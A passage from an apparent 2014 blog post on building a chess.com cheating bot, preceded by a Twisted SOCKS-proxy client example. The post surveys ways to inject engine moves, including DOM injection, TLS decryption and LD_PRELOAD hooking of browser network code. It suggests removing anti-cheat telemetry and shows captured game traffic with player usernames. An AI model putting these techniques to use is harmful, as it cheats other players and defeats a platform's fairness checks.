<span class="n">f</span><span class="o">.</span><span class="n">_timer</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span>
<span class="n">wf</span> <span class="o">=</span> <span class="n">createWrappingFactory</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_reactor</span><span class="o">.</span><span class="n">connectTCP</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_host</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">_port</span><span class="p">,</span> <span class="n">wf</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'SOCKET'</span><span class="p">)</span>
<span class="k">return</span> <span class="n">f</span><span class="o">.</span><span class="n">handshakeDone</span>
<span class="k">except</span><span class="p">:</span>
<span class="k">return</span> <span class="n">defer</span><span class="o">.</span><span class="n">fail</span><span class="p">()</span>
</code></pre></div>
<p>You can use the module for HTTP connection endpoints somehow like that</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># Copyright (c) 2011-2013, The Tor Project</span>
<span class="c1"># See LICENSE for the license.</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">urlparse</span> <span class="kn">import</span> <span class="n">urlparse</span>
<span class="kn">from</span> <span class="nn">twisted.internet</span> <span class="kn">import</span> <span class="n">reactor</span><span class="p">,</span> <span class="n">endpoints</span>
<span class="kn">from</span> <span class="nn">socksclient</span> <span class="kn">import</span> <span class="n">SOCKSv4ClientProtocol</span><span class="p">,</span> <span class="n">SOCKSWrapper</span>
<span class="kn">from</span> <span class="nn">twisted.web</span> <span class="kn">import</span> <span class="n">client</span>
<span class="k">class</span> <span class="nc">TestClass</span><span class="p">:</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">npages</span> <span class="o">=</span> <span class="mi">0</span>
<span class="bp">self</span><span class="o">.</span><span class="n">timestamps</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">def</span> <span class="nf">wrappercb</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">proxy</span><span class="p">):</span>
<span class="nb">print</span> <span class="s2">"connected to proxy"</span><span class="p">,</span> <span class="n">proxy</span>
<span class="k">def</span> <span class="nf">clientcb</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span>
<span class="nb">print</span> <span class="s2">"ok, got: </span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="n">content</span><span class="p">[:</span><span class="mi">120</span><span class="p">]</span>
<span class="nb">print</span> <span class="s2">"timetamps "</span> <span class="o">+</span> <span class="nb">repr</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">timestamps</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">npages</span> <span class="o">-=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">npages</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">reactor</span><span class="o">.</span><span class="n">stop</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">sockswrapper</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">proxy_config</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">dest</span> <span class="o">=</span> <span class="n">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
<span class="k">assert</span> <span class="n">dest</span><span class="o">.</span><span class="n">port</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">,</span> <span class="s1">'Must specify port number.'</span>
<span class="n">endpoint</span> <span class="o">=</span> <span class="n">endpoints</span><span class="o">.</span><span class="n">TCP4ClientEndpoint</span><span class="p">(</span><span class="n">reactor</span><span class="p">,</span> <span class="n">dest</span><span class="o">.</span><span class="n">hostname</span><span class="p">,</span> <span class="n">dest</span><span class="o">.</span><span class="n">port</span><span class="p">)</span>
<span class="k">return</span> <span class="n">SOCKSWrapper</span><span class="p">(</span><span class="n">reactor</span><span class="p">,</span> <span class="n">endpoint</span><span class="p">,</span> <span class="n">proxy_config</span><span class="p">,</span> <span class="n">timestamps</span><span class="o">=</span><span class="bp">self</span><span class="o">.</span><span class="n">timestamps</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="n">thing</span> <span class="o">=</span> <span class="n">TestClass</span><span class="p">()</span>
<span class="c1"># Mandatory first argument is a URL to fetch over Tor (or whatever</span>
<span class="c1"># SOCKS proxy that is running on localhost:9050).</span>
<span class="n">url</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">proxy_config</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'host'</span><span class="p">:</span> <span class="s1">'127.0.0.1'</span><span class="p">,</span>
<span class="s1">'port'</span><span class="p">:</span> <span class="mi">1080</span><span class="p">,</span>
<span class="s1">'version'</span><span class="p">:</span> <span class="s1">'4'</span><span class="p">,</span>
<span class="s1">'version_specific'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'rdns'</span><span class="p">:</span> <span class="kc">True</span><span class="p">,</span> <span class="c1"># Enforce resolving hostnames remotely (Only supported by version 4a and 5)</span>
<span class="s1">'cmd'</span><span class="p">:</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x01</span><span class="s1">'</span><span class="p">,</span> <span class="c1"># this may be CONNECT, BIND and UDP in version 5. In 4 and 4a, it's always CONNECT or BIND</span>
<span class="s1">'username'</span><span class="p">:</span> <span class="s1">'socksuser'</span><span class="p">,</span> <span class="c1"># Enables simple username/password authentication mechanism in version 5</span>
<span class="s1">'password'</span><span class="p">:</span> <span class="s1">''</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">proxy_config2</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'host'</span><span class="p">:</span> <span class="s1">'212.224.92.182'</span><span class="p">,</span>
<span class="s1">'port'</span><span class="p">:</span> <span class="mi">7777</span><span class="p">,</span>
<span class="s1">'version'</span><span class="p">:</span> <span class="s1">'5'</span><span class="p">,</span>
<span class="s1">'version_specific'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'rdns'</span><span class="p">:</span> <span class="kc">True</span><span class="p">,</span> <span class="c1"># Enforce resolving hostnames remotely (Only supported by version 4a and 5)</span>
<span class="s1">'cmd'</span><span class="p">:</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x01</span><span class="s1">'</span><span class="p">,</span> <span class="c1"># this may be CONNECT, BIND and UDP in version 5. In 4 and 4a, it's always CONNECT or BIND</span>
<span class="s1">'username'</span><span class="p">:</span> <span class="s1">'someuser'</span><span class="p">,</span> <span class="c1"># Enables simple username/password authentication mechanism in version 5</span>
<span class="s1">'password'</span><span class="p">:</span> <span class="s1">'somepass'</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1"># From http://fastproxyservers.org/socks5-servers.htm</span>
<span class="n">proxy_config3</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'host'</span><span class="p">:</span> <span class="s1">'202.84.44.129'</span><span class="p">,</span>
<span class="s1">'port'</span><span class="p">:</span> <span class="mi">1080</span><span class="p">,</span>
<span class="s1">'version'</span><span class="p">:</span> <span class="s1">'4'</span><span class="p">,</span>
<span class="s1">'version_specific'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'rdns'</span><span class="p">:</span> <span class="kc">True</span><span class="p">,</span> <span class="c1"># Enforce resolving hostnames remotely (Only supported by version 4a and 5)</span>
<span class="s1">'cmd'</span><span class="p">:</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x01</span><span class="s1">'</span><span class="p">,</span> <span class="c1"># this may be CONNECT, BIND and UDP in version 5. In 4 and 4a, it's always CONNECT or BIND</span>
<span class="s1">'username'</span><span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># Enables simple username/password authentication mechanism in version 5</span>
<span class="s1">'password'</span><span class="p">:</span> <span class="s1">''</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">f</span> <span class="o">=</span> <span class="n">client</span><span class="o">.</span><span class="n">HTTPClientFactory</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">deferred</span><span class="o">.</span><span class="n">addCallback</span><span class="p">(</span><span class="n">thing</span><span class="o">.</span><span class="n">clientcb</span><span class="p">)</span>
<span class="n">sw</span> <span class="o">=</span> <span class="n">thing</span><span class="o">.</span><span class="n">sockswrapper</span><span class="p">(</span><span class="n">proxy_config2</span><span class="p">,</span> <span class="n">url</span><span class="p">)</span>
<span class="n">d</span> <span class="o">=</span> <span class="n">sw</span><span class="o">.</span><span class="n">connect</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="n">d</span><span class="o">.</span><span class="n">addCallback</span><span class="p">(</span><span class="n">thing</span><span class="o">.</span><span class="n">wrappercb</span><span class="p">)</span>
<span class="n">thing</span><span class="o">.</span><span class="n">npages</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="n">reactor</span><span class="o">.</span><span class="n">run</span><span class="p">()</span>
<span class="k">if</span> <span class="s1">'__main__'</span> <span class="o">==</span> <span class="vm">__name__</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>The art of cheating: Making a chess.com chess bot following an unusual approach!2014-01-26T02:11:00+01:002014-01-26T02:11:00+01:00Nikolai Tschachertag:incolumitas.com,2014-01-26:/2014/01/26/the-art-of-cheating-making-a-chess-com-chess-bot-using-a-unusual-approach/<h3>Table of contents</h3>
<ol>
<li><strong><a href="#chap_preface">Preface</a></strong>: Giving first insight into the idea and
why I think that hooking into a browser is a good idea.</li>
<li><strong><a href="#chap_dwmbgb">Many different ways to make browser game bots</a></strong>:
Discussion various techniques to write HTTP/WebSocket bots</li>
<li><strong><a href="#chap_internals">How does chess.com internally look like?</a></strong>:
Investigation of the client side behavior of
<a href="http://chess.com">chess.com</a></li>
<li><strong><a href="#chap_workings">How the bot works</a></strong>: Explaining how my shared
library hooks firefox network functions</li>
<li><strong><a href="#chap_concl">Conclusion</a></strong>: Summary of my discoveries</li>
<li><strong><a href="https://vimeo.com/85060026" title="Link to the demonstration of the bot">Demo
Video</a>
and another, <a href="https://vimeo.com/85083958" title="demo video, better">better demo
video</a></strong>: You might
only watch that video, but make sure you <a href="#chap_demo">read the explanation on
the very bottom of this blog post!</a></li>
<li>You may find the sources to the shared library (so) on my <a href="https://github.com/NikolaiT/chess-com-cheat/" title="Link to chess.com cheat library">github
account</a>.</li>
</ol>
<h3 id="chap_preface">Preface</h3>
<p>Usually I don't have good ideas in forms of flashes of genius. On the
contrary, I think that many endeavors and interesting projects might be
reasonable if realized, but often so, there's a huge amount of work
involved and <em>too</em> many variables and strategic decisions in the process
that could eventually render the project a failure. What I try to say: A
mediocre idea well engineered might be a good product. But a good idea
badly implemented and designed is usually just bad in …</p><h3>Table of contents</h3>
<ol>
<li><strong><a href="#chap_preface">Preface</a></strong>: Giving first insight into the idea and
why I think that hooking into a browser is a good idea.</li>
<li><strong><a href="#chap_dwmbgb">Many different ways to make browser game bots</a></strong>:
Discussion various techniques to write HTTP/WebSocket bots</li>
<li><strong><a href="#chap_internals">How does chess.com internally look like?</a></strong>:
Investigation of the client side behavior of
<a href="http://chess.com">chess.com</a></li>
<li><strong><a href="#chap_workings">How the bot works</a></strong>: Explaining how my shared
library hooks firefox network functions</li>
<li><strong><a href="#chap_concl">Conclusion</a></strong>: Summary of my discoveries</li>
<li><strong><a href="https://vimeo.com/85060026" title="Link to the demonstration of the bot">Demo
Video</a>
and another, <a href="https://vimeo.com/85083958" title="demo video, better">better demo
video</a></strong>: You might
only watch that video, but make sure you <a href="#chap_demo">read the explanation on
the very bottom of this blog post!</a></li>
<li>You may find the sources to the shared library (so) on my <a href="https://github.com/NikolaiT/chess-com-cheat/" title="Link to chess.com cheat library">github
account</a>.</li>
</ol>
<h3 id="chap_preface">Preface</h3>
<p>Usually I don't have good ideas in forms of flashes of genius. On the
contrary, I think that many endeavors and interesting projects might be
reasonable if realized, but often so, there's a huge amount of work
involved and <em>too</em> many variables and strategic decisions in the process
that could eventually render the project a failure. What I try to say: A
mediocre idea well engineered might be a good product. But a good idea
badly implemented and designed is usually just bad in it's final form.</p>
<p>Raw, abstract ideas exist in abundance. So does the will to make them
happen. But once in a while, I manage to overcome these two hindrances
and begin to build and shape my ideas into reality.</p>
<p>So around 10 days ago (yes it took me that long to make it) I went
jogging in the forest and my subconscious searched for different
possibilities to cheat in a chess browser game
(<a href="http://chess.com" title="chess server">chess.com</a> to be specific). I knew
that there were quite some different approaches. So before I get all to
technical, let's define the obstacle:</p>
<p>I want build a bot that plays automatic actions/moves on a online chess
server, whose communication is realized over HTTP 1/1 and
<a href="http://tools.ietf.org/html/rfc6455">WebSocket</a> (https and wws
respectively), all TLS/SSL encrypted.</p>
<p>Additionally the following constraints need to be considered:</p>
<ul>
<li>The bot should work <em>while the player is actually playing</em>. That
means: Without any real action by a human, the bot won't do anything
at all.</li>
<li>The engine that computes the moves is a local process. I chose
<a href="http://stockfishchess.org/">Stockfish</a>: it has a pretty decent
strength and is open source which makes it usable on Linux contrary
to Houdini. If we want to use engine calculated information in the
browser we need to get a channel to a local process. We can't
integrate Stockfish originated data into the browser process space
with memory injection methods, since it seems hard and I don't know
how to do it (correctly). But we surely may interact with the local
process in any other possible IPC way.</li>
</ul>
<p>So this was my idea that overcame me in the woods while running: Why
should I even bother rebuilding the whole chess.com communication
protocol, when I can just <em>replace the moves I made ingame with engine
calculated equivalents?!</em></p>
<p>Every move (like <em>a2a3</em> or <em>g7g8</em>) has identical lengths, so I need to
find the point where the packets (or messages in WebSockets RFC
terminology) are still decrypted (note that all traffic is TLS/SSL
layered) such that it's possible to update them, without dealing with
the hassle of TLS/SSL.</p>
<p>And there is only one place where I can do this: Inside of the browser
process space, in some networking function that sends and receives the
target packets. This was my idea. I knew that it must be possible to
find this <em>hook point</em> and to alter the packets somewhere.</p>
<p>But hell, I didn't knew that this approach was that hard to achieve!</p>
<p>So before I'll dive into the technical internals, I'll discuss the
different possible architectures and designs of cheating <em>in particular</em>
for a chess.com bot, but which are also perfectly applicable <em>to general
browser game automation</em>.</p>
<h3 id="chap_dwmbgb">Many different ways to make browser game bots!</h3>
<ol>
<li><strong>A high level approach</strong> would be to inject custom javascript into
the DOM of a running browser session.<br>
This piece of javascript then connects to a local server (e.g. to a
simple server listening on localhost:SOMEPORT) that responses with a
bot calculated move when requesting with the current game action
history. A pretty nice example of this technique is <a href="http://www.youtube.com/watch?v=PW1vMXHJdnM" title="high level javascript bot">this video on
youtube</a>
(I suppose it uses this design paradigm, but I don't know because
there are no open sources to investigate further).<br>
<em>Advantages</em>: Comparably easy implementation, because we don't need
to tinker with packets and can directly attack the game logic. Works
for all platforms and all browsers, because javascript is
universally runnable.<br>
<em>Drawbacks:</em> Maybe we can't build a connection to localhost due to
the same-origin policy (Can we?) This would render this approach
impossible, since we absolutely need a way to communicate with the
local program that supplies us with engine moves. Then maybe a
socket connection (although listening on localhost) might be slower
than other
<a href="http://en.wikipedia.org/wiki/Inter-process_communication" title="inter process communication techniques">IPC</a>
techniques, because of the TCP/IP stack overhead.</li>
<li><strong>Another high level technique</strong> would be to write a custom browser
extension that intercepts the browser game traffic and injects bot
calculated moves.<br>
<em>Advantages</em>: We don't need to hassle with SSL/TLS decryption
because our application is executed in the browser process.
Furthermore it must be somehow possible to communicate with a local
process that supplies the extension with engine knowledge.<br>
<em>Disadvantages</em>: Platform and browser dependent code. When going
down that road, I would need to write platform independent C code
for different browsers. Additionally, it's questionable if we can
speak to different processes, because of the browser sandboxes and
their security policies.</li>
<li><strong>Another approach: Low level network stack interception
technique:</strong> I could sniff on the network interface where the TCP
packets of the communication sessions are exchanged with a
appropriate API like
<a href="http://www.secdev.org/projects/scapy/" title="awesome python security module">scapy</a>
or <a href="http://www.tcpdump.org/" title="the library behind tcpdump">libpcap</a>
(When writing C directly). Because the communication is encrypted
with SSL/TLS, there needs to be a reliable way to decrpyt the TCP
packets. This is not a trivial task, since different browsers use
different ciphers/HMACS for TSL/SSL (they are determined in the
<a href="http://en.wikipedia.org/wiki/Transport_Layer_Security#TLS_handshake" title="SSL handshake protocol">handshake</a>).<br>
This issue however is alleviated by the fact that some browsers can
be started with a option (environment variable
<a href="https://developer.mozilla.org/en-US/docs/NSS_Key_Log_Format">SSLKEYLOGFILE</a>)
to dump the current key secrets of a SSL/TLS session to a file which
my bot could use to decrypt/encrypt the traffic on the fly.<br>
Once decrypted, I would modify the appropriate move values and
replace the action I made, with the bot calculated move. Then I need
to encrypt the packet again with the cipher specified in the
SSLKEYLOGFILE. But this implies several issues as for example:<br>
How can my sniffer/bot know which cipher was used? He only knows
the current keys for the session, but not the ciphers. In the worst
case, we need to also sniff the SSL/TLS handshake and connection
start. This again is a very tedious process since the many quirks
and combinations of a TLS session beginning.<br>
Padding shouldn't be a bigger issue because the moves in the packet
are just replaced and no additional data is injected or deleted. So
the TCP packets should stay the same. We only need to recalculate
the checksums.</li>
<li>Another <em>thoroughly</em> low level approach: <strong>Hooking <a href="http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html">.so
libraries</a>!</strong>
This was my idea while running in the forest!<br>
This might be the hardest approach in the investigation and
research phase (It's not a easy task to find the correct hooking
points in the HUGE chromium or firefox code base, but it looks like
the <a href="https://developer.mozilla.org/en-US/docs/NSS">NSS library</a> is a
good starting point), but also the most elegant way, because we
don't need to hassle with SSL/TLS quirks and can work with plaintext
HTTP requestes/responses, when we find a good hook point. This
approach, although very elegant and straightforward comes with huge
drawbacks:<br>
Hooking is very platform depended. On linux we could hook with
kernel modules or the <a href="http://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/">LD_PRELOAD
trick</a>.
On Windows we'd need other hooking techniques like IAT hooking,
using the microsoft hooking library or something else. Additionally,
we need to know the target architecutre (Differences between x86 and
amd64). But from what I know now, this approach seems to be the best
compared to the others, because we can work in the target process
space (The browser userland process space itself) and we do not
reassemble/decrypt packets ourselves (like in the previous
technique). <strong>Form grabbers are a related technique</strong> used by
blackhats for their trojans.</li>
<li>
<p><strong>The traditional way</strong>: Re-implement the high level browser game
protocol by forging messages and HTTP Requests. This is not very
elegant because our goal is to just modify packets. But when
following this approach, we'd need to rebuilt the whole game logic
(or at least many parts). This'd look something like the following:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="n">login</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s1">'https://browsergame.com'</span><span class="p">,</span> <span class="p">{</span><span class="s1">'login'</span><span class="p">:</span> <span class="n">user</span><span class="p">,</span> <span class="s1">'password'</span><span class="p">:</span> <span class="k">pass</span><span class="p">})</span>
<span class="k">if</span> <span class="n">login</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">success</span><span class="p">():</span>
<span class="n">requeset</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'https://browsergame.com/action.php?gamelogic=blabla'</span><span class="p">)</span>
<span class="c1"># Do implement game logic</span>
</code></pre></div>
</li>
<li>
<p><strong>The easy way:</strong> Make a click bot! Just control the mouse
programmatically and initiate actions like a human would.<br>
Normally such bots learn where the chess board in the browser
window is located in the browser window by comparing the pixel
colors of the screen with the color of the chess squares (or
whatever field you want to locate). Slightly more adanced would be
to locate the html elements that represent the squares and
recalculate the exact location based on viewport sizes and settings
and rendering. But I don't know how it is actually made, do you have
a idea?<br>
Anyways, the huge majority of chess.com bots is of this
architecture type. You can view them in action
<a href="http://www.youtube.com/watch?v=1SwOskkPnS0">here</a> or
<a href="http://www.youtube.com/watch?v=5osrRuz4tvM" title="high level chess.com bot">here</a>
on youtube.<br>
<em>Advantages</em>: Very easy to implement, very powerful technique, very
good possibilities to evade anti cheating techniques (For instance,
if <em>there were</em> cheating detection <em>besides</em> the ones who detect and
doom very strong play as engine originated, these approaches would
try to find out whether the current player is human by interpreting
mouse movements and intervals between moves. But somewhere this
information has to be gathered and sent to a server. We could just
remove this submittal and therefore the server has no way to learn
that we are cheaters).</p>
</li>
</ol>
<h3 id="chap_internals">How does chess.com internals look like?</h3>
<p>Having discussed the different architectures for a bot (Remember: I
chose the hooking technique!) it was time to learn more about the
target.</p>
<p>My plan was very ambitions, because I had very little experience with
hooking processes and hell, I didn't code in C or assembly for over 1.5
years, nor did I have much experience in the past. Muppets! Even now, I
know nothing about low level stuff at all.</p>
<p>So it was definitely time <strong>to get my learning hat on</strong> and to
investigate how <a href="http://chess.com">chess.com</a> works.</p>
<p>I based a lot of my investigations on the <a href="https://code.google.com/p/v8/">V8
debugger</a>, the one integrated in the
Chrome browser dev tools. I am not much of a Google fan, but Jesus
fucking Christ, Chrome's Development tools (the stuff that pops up when
you click on <em>Inspect Element</em> in the context menu) is just a very well
crafted tool!</p>
<p>It's very fast, newer hangs or remarkably loads and there are so many
features whilst maintaining a very clear and concise interface. If you
don't know how to use it, I really suggest reading and spending a hour
on this tutorial (Do the assignments, otherwise what you learned won't
stick): <a href="https://developers.google.com/chrome-developer-tools/docs/javascript-debugging">DevTools javascript debugger
tutorial</a>.</p>
<p>So by using this debugger I found out that chess.com inner client side
machinery essentially consists of around 30k lines of javascript code.
There are three major files, LiveChessAdvanced.js, LiveChessBase.js,
LiveChessCore.js, you can see a excerpt in the screenshot below:</p>
<p>[caption id="attachment_654" align="alignleft" width="640"]<a href="https://incolumitas.com/uploads/2014/01/Screenshot-from-2014-01-26-055418.png"><img alt="Look into
the chess.com internals with the Chrome debugging
tools" src="https://incolumitas.com/uploads/2014/01/Screenshot-from-2014-01-26-055418-1024x515.png"></a>
<em>Look into the chess.com internals with the Chrome debugging
tools</em>[/caption]</p>
<p>Furthermore all of chess.com's networking is handled by a file called
cometd.js, so chess.com makes use of the <em>Bayeux protocol</em>. You can
learn more about the javascript library on
<a href="http://cometd.org/">cometd.org</a>.</p>
<p>But why such a strange protocol?</p>
<p>HTTP 1.1 is a request response protocol, it's not suited to implement
complex game protocols.</p>
<p>This was quite a issue in the last years, because companies wanted to
bring complex applications (like browser games) to the browser and so
they implemented a range of techniques that circumvented these obstacles
by exploiting some HTTP quirks, like the fact that HTTP connections stay
open under specific circumstances, like loading javascript in chunks (A
form of long polling, it's basically just creating <em>script</em> elements in
excess and pointing their <em>src</em> attribute to the cometd server which
then sends back JavaScript (or JSONP) with events as its payload). Or
you can achieve alternatively the same with frames. All these techniques
are summarized under the umbrella term cometd, and <a href="http://en.wikipedia.org/wiki/Comet_(programming)">you should read
about them on
wikipedia</a>.</p>
<p>But in late 2011 the <a href="http://tools.ietf.org/html/rfc6455" title="RFC for WebSocket">WebSocket
standard</a> was
established in it's final form and nowadays we don't need to make use of
cometd techniques (At least I assume that WebSocket should replace these
techniques), because we can make bi-directional, full-duplex
(simultaneous communication in both directions) TCP like connections
using WebSockets. And this is exactly what chess.com does, it
exclusively uses WebSockets for their protocol, when the connection is
good enough.</p>
<p>But now comes the first quirk: I strongly assume that this cometd.js
library provides fallbacks for the case they detect that WebSockets
aren't working for some reason. This happend to me quite often:</p>
<p>My internet connection here is very messy and I have a speed limit of
around 60kps downstream and around 10kps upstream. I don't know if this
could be a reason, that <a href="https://github.com/cometd/cometd" title="cometd on github">the
library</a> sometimes
changes protocols, but it certainly does. I first realized this, when I
was able to intercept the game traffic using the HttpHeaders firefox
plugin (that, like the name suggests, only captures HTTP traffic) and
then suddenly in the next game the captured traffic was empty. So I
concluded that the protocol responsible for the game traffic must be
chosen dynamically, for which the connection stability seems to be a
variable!</p>
<p>So enough written, <strong>show me some protocol examples of chess.com</strong> you
shout! Here you go:</p>
<p>This is a typical WebSocket JSON message from the server that updates
the game state of a game (This packet belongs to a game that I was
received while kibitzing, not one I played myself):</p>
<div class="highlight"><pre><span></span><code>[{"data":{"sid":"gserv","game":{"id":709324515,"gametype":"chess","time":{"basetime":600,"timeinc":0},"players":[{"uid":"DAHUANXIONG","status":"online","lag":2,"lagms":220,"lightning":2105,"blitz":2064,"standard":1361,"lightning960":1200,"blitz960":1200,"standard960":1200,"bughouse":1200,"ml":10,"title":null,"mod":false,"new":false,"country":"CN","av":true,"avatar":"//d1lalstwiwz2br.cloudfront.net/images_users/avatars/DAHUANXIONG_small.1.jpeg","clientfeatures":{"examineboard":true,"multiplegames":true,"clientname":"LC4Full v2013121801; Chrome/25; Windows"},"nonverified":true},{"uid":"Mrsinj","status":"playing","lag":2,"lagms":259,"gid":709324515,"lightning":2153,"blitz":2205,"standard":1200,"lightning960":1200,"blitz960":1200,"standard960":1200,"bughouse":1200,"ml":10,"title":null,"mod":false,"new":false,"country":"RS","av":true,"avatar":"//d1lalstwiwz2br.cloudfront.net/images_users/avatars/Mrsinj_s.1.jpg","clientfeatures":{"examineboard":false,"multiplegames":true,"clientname":"LC4Simple v2013121801; Chrome/32; Windows"}}]},"tid":"Game"},"channel":"/game/~1"}]
</code></pre></div>
<p>If you're not a fan of such unformatted, jammed JSON data, you should
inspect the code on a online JSON editor like
<a href="http://www.jsoneditoronline.org/">www.jsoneditoronline.org</a>.</p>
<p>A few interesting fields: <em>uid</em> identifies the players, <em>status</em> can be
<em>starting</em>, <em>in_progress</em>, <em>aborted</em> or <em>stopped</em>, <em>lag</em> and <em>lagms</em>
specify the lag of the player (How can you measure that?). Funny enough,
the protocol architect uses redundant information here, <em>lag</em> is just
the rounded version of <em>lagms</em>, but it doesn't bring other information.</p>
<p><em>gid</em> is the global game id. For instance, you should be able to revisit
the upper game under the following link
<em>http://www.chess.com/livechess/game?id=709324515</em>. But this particular
message above is not of big interest, because it doesn't contain any
moves, it just provides some status information. The packets that are
sent on every move made look like the next message:</p>
<div class="highlight"><pre><span></span><code>[{"data":{"sid":"gserv","game":{"id":709324427,"status":"in_progress","seq":9,"players":[{"uid":"ImaginaryDunker","status":"playing","lag":1,"lagms":132,"gid":709324427},{"uid":"Alexander_Donchenko","status":"playing","lag":1,"lagms":115,"gid":709324427}],"moves":"gvYIlBIBvB0KBrZJow","clocks":[582,571],"draws":[],"squares":[0,0]},"tid":"GameState"},"channel":"/game/709324427"}]
</code></pre></div>
<p>Three fields are of particular importance,
<em>"moves":"gvYIlBIBvB0KBrZJow"</em>, <em>"clocks":[582,571]</em> and
<em>"status":"in_progress"</em>. They are pretty much self explanatory at this
point I suppose.</p>
<p>So let's finally <strong>look at a typical game session</strong> in terms of parsed
WebSocket messages. Please note that I might not include all messages
that are exchanged in a game session, simply because I don't care to
much for trivial information (like polling the server for specific
features). The bottom messages are the ones which count when you want to
understand a typical game session:</p>
<p>First of all, a connection message to the server is sent when the
browser connects to the server:</p>
<p><strong>1. Initial connection outbound message</strong></p>
<div class="highlight"><pre><span></span><code><span class="p">[{</span><span class="s2">"channel"</span><span class="s s-Atom">:</span><span class="s2">"/meta/connect"</span><span class="p">,</span><span class="s2">"connectionType"</span><span class="s s-Atom">:</span><span class="s2">"ssl-websocket"</span><span class="p">,</span><span class="s2">"advice"</span><span class="s s-Atom">:</span><span class="p">{</span><span class="s2">"timeout"</span><span class="s s-Atom">:</span><span class="mi">0</span><span class="p">},</span><span class="s2">"id"</span><span class="s s-Atom">:</span><span class="s2">"10"</span><span class="p">,</span><span class="s2">"clientId"</span><span class="s s-Atom">:</span><span class="s2">"6djua267g6n8ydja21m8yhztj3gtpx"</span><span class="p">,</span><span class="s2">"ext"</span><span class="s s-Atom">:</span><span class="p">{</span><span class="s2">"ack"</span><span class="p">:-</span><span class="mi">1</span><span class="p">,</span><span class="s2">"timesync"</span><span class="s s-Atom">:</span><span class="p">{</span><span class="s2">"tc"</span><span class="s s-Atom">:</span><span class="mi">1390715596738</span><span class="p">,</span><span class="s2">"l"</span><span class="s s-Atom">:</span><span class="mi">661</span><span class="p">,</span><span class="s2">"o"</span><span class="p">:-</span><span class="mi">17527952</span><span class="p">}}}]</span>
</code></pre></div>
<p>I am not sure, that encoding/encryption the clientId is, but it didn't
matter for my purpose to write a bot. So when I expect a challenge from
another player, I receive such a packet:</p>
<p><strong>2. Game begins</strong></p>
<div class="highlight"><pre><span></span><code>[{"data":{"sid":"gserv","game":{"id":709341692,"status":"starting","seq":0,"players":[{"uid":"ponkhan","status":"playing","lag":2,"lagms":285,"gid":709341692},{"uid":"EatingSpiders","status":"playing","lag":1,"lagms":177,"gid":709341692}],"abortable":[true,true],"moves":"","clocks":[600,600],"draws":[],"repeated":true,"squares":[0,0]},"tid":"GameState"},"channel":"/game/709341692"}]
</code></pre></div>
<p>Noteworthy is the <em>status</em> "starting". As you can see, the <em>moves</em> value
is still empty. Then my adversary made a move and I receive again a
message in the style as above:</p>
<p><strong>3. First move received</strong></p>
<div class="highlight"><pre><span></span><code>[{"data":{"sid":"gserv","game":{"id":709341692,"status":"starting","seq":1,"players":[{"uid":"ponkhan","status":"playing","lag":3,"lagms":381,"gid":709341692},{"uid":"EatingSpiders","status":"playing","lag":1,"lagms":183,"gid":709341692}],"abortable":[true,true],"moves":"mC","clocks":[600,600],"draws":[],"squares":[0,0]},"tid":"GameState"},"channel":"/game/709341692"}]
</code></pre></div>
<p>Now <em>moves</em> isn't empty anymore, it contains <em>"mC"</em>, but what the heck
does it mean?</p>
<p>It's basically a encoding of chess.com for their move notation. I don't
